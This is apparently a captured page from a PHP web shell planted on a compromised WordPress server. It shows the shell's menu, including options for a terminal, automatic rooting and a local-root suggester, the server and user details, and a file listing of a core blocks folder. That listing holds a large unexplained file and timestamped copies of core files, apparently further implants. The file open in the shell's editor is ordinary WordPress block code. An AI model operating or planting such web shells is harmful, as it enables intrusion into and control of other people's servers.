Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.148.182.104
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
table /
Delete
Unzip
Name
Size
Permission
Date
Action
SETer.php
166.01
KB
-rw-r--r--
2025-03-30 05:28
block-bindings-20250514173405.php
5.46
KB
-rw-r--r--
2024-07-16 17:55
block.json
4.3
KB
-rw-r--r--
2025-04-15 17:44
cache-compat.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
class-json.php
42.66
KB
-rw-r--r--
2023-02-03 13:35
class-oembed.php
401
B
-rw-r--r--
2022-06-17 11:20
class-simplepie.php
453
B
-rw-r--r--
2024-11-13 12:36
class-wp-locale.php
16.49
KB
-rw-r--r--
2025-04-15 17:44
class-wp-phpmailer.php
3.71
KB
-rw-r--r--
2025-04-15 17:44
class-wp-taxonomy.php
18.12
KB
-rw-r--r--
2025-04-15 17:44
class-wp-user.php
22.46
KB
-rw-r--r--
2025-04-15 17:44
class-wp.php
25.7
KB
-rw-r--r--
2025-04-15 17:44
comment-date-20250514173159.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
comment-date.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
comments-title.php
2.71
KB
-rw-r--r--
2024-07-16 17:55
data.min.js
25
KB
-rw-r--r--
2025-04-15 17:44
default-widgets.php
2.24
KB
-rw-r--r--
2025-04-15 17:44
edit-post.js
120.43
KB
-rw-r--r--
2025-04-30 17:44
editor-rtl.css
1.56
KB
-rw-r--r--
2024-04-03 05:49
editor-rtl.min.css
1.46
KB
-rw-r--r--
2024-04-03 05:49
editor.css
856
B
-rw-r--r--
2024-07-16 17:55
editor.min.css
1.46
KB
-rw-r--r--
2024-04-03 05:49
element.min.js
11.69
KB
-rw-r--r--
2025-04-15 17:44
home-link.php
5.31
KB
-rw-r--r--
2025-04-15 17:44
https-migration.php
4.63
KB
-rw-r--r--
2023-07-10 22:38
latest-comments.php
4.92
KB
-rw-r--r--
2024-07-16 17:55
latest-posts.php
8.34
KB
-rw-r--r--
2024-11-13 12:36
ms-network-20250514173520.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
ms-network.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
post-title.php
2.09
KB
-rw-r--r--
2024-07-16 17:55
registration-functions.php
200
B
-rw-r--r--
2020-11-12 11:17
shortcode.min-20250513213234.js
2.58
KB
-rw-r--r--
2022-09-23 19:55
site-title.php
1.81
KB
-rw-r--r--
2025-04-15 17:44
speculative-loading.php
8.36
KB
-rw-r--r--
2025-04-15 17:44
style-engine-20250514173207.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-engine.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-rtl.css
3.96
KB
-rw-r--r--
2024-04-03 05:49
style-rtl.min.css
3.76
KB
-rw-r--r--
2024-04-03 05:49
style.css
3.96
KB
-rw-r--r--
2024-04-03 05:49
style.min.css
3.76
KB
-rw-r--r--
2024-04-03 05:49
theme-rtl.css
261
B
-rw-r--r--
2024-07-16 17:55
theme-rtl.min.css
232
B
-rw-r--r--
2024-07-16 17:55
theme.css
261
B
-rw-r--r--
2024-07-16 17:55
theme.min.css
232
B
-rw-r--r--
2024-07-16 17:55
Save
Rename
<?php /** * Server-side rendering of the `core/comments-title` block. * * @package WordPress */ /** * Renders the `core/comments-title` block on the server. * * @since 6.0.0 * * @param array $attributes Block attributes. * * @return string Return the post comments title. */ function render_block_core_comments_title( $attributes ) { if ( post_password_required() ) { return; } $align_class_name = empty( $attributes['textAlign'] ) ? '' : "has-text-align-{$attributes['textAlign']}"; $show_post_title = ! empty( $attributes['showPostTitle'] ) && $attributes['showPostTitle']; $show_comments_count = ! empty( $attributes['showCommentsCount'] ) && $attributes['showCommentsCount']; $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $align_class_name ) ); $comments_count = get_comments_number(); /* translators: %s: Post title. */ $post_title = sprintf( __( '“%s”' ), get_the_title() ); $tag_name = 'h2'; if ( isset( $attributes['level'] ) ) { $tag_name = 'h' . $attributes['level']; } if ( '0' === $comments_count ) { return; } if ( $show_comments_count ) { if ( $show_post_title ) { if ( '1' === $comments_count ) { /* translators: %s: Post title. */ $comments_title = sprintf( __( 'One response to %s' ), $post_title ); } else { $comments_title = sprintf( /* translators: 1: Number of comments, 2: Post title. */ _n( '%1$s response to %2$s', '%1$s responses to %2$s', $comments_count ), number_format_i18n( $comments_count ), $post_title ); } } elseif ( '1' === $comments_count ) { $comments_title = __( 'One response' ); } else { $comments_title = sprintf( /* translators: %s: Number of comments. */ _n( '%s response', '%s responses', $comments_count ), number_format_i18n( $comments_count ) ); } } elseif ( $show_post_title ) { if ( '1' === $comments_count ) { /* translators: %s: Post title. */ $comments_title = sprintf( __( 'Response to %s' ), $post_title ); } else { /* translators: %s: Post title. */ $comments_title = sprintf( __( 'Responses to %s' ), $post_title ); } } elseif ( '1' === $comments_count ) { $comments_title = __( 'Response' ); } else { $comments_title = __( 'Responses' ); } return sprintf( '<%1$s id="comments" %2$s>%3$s</%1$s>', $tag_name, $wrapper_attributes, $comments_title ); } /** * Registers the `core/comments-title` block on the server. * * @since 6.0.0 */ function register_block_core_comments_title() { register_block_type_from_metadata( __DIR__ . '/comments-title', array( 'render_callback' => 'render_block_core_comments_title', ) ); } add_action( 'init', 'register_block_core_comments_title' );